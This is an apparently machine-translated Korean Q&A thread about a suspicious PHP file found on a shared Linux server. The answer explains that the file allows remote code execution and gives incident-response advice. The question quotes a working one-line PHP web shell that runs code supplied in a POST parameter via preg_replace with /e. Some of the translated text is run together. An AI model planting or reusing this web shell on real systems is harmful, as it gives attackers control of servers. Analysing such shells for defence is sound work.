방금 누군가가 우리가 공유 Linux 서버에서 호스팅하는 애플리케이션에 PHP 파일을 업로드한 것을 발견했습니다.6fbb2.php파일 내용은 다음과 같습니다.
EEC4D8E4439299046B8CDB3F782<?php @preg_replace("/[pageerror]/e",$_POST['xbfk'],"saft"); ?>
이 파일의 목적이 무엇인지 아시는 분 계신가요? 나는 무엇을 해야 합니까?
답변1
이 문서의 목적은 다음과 같습니다.누군가가 임의의 코드를 실행하게 하세요귀하의 서버에서HTTP를 통해.
당신이 해야 할 일은 사이트에 대한 액세스를 즉시 종료하고 가능하다면 나머지 서버에서 복원할 수 있는 검증 가능한 백업을 찾고 모든 것을 매우 주의 깊게 확인하여 그들이 무엇을 했는지, 무엇을 했는지 알아내는 것입니다. 먼저 문제를 다시 활성화하기 전에 문제를 해결할 수 있습니다.
또한보십시오:감염된 서버를 처리하는 방법은 무엇입니까?시큐리티SE에 대하여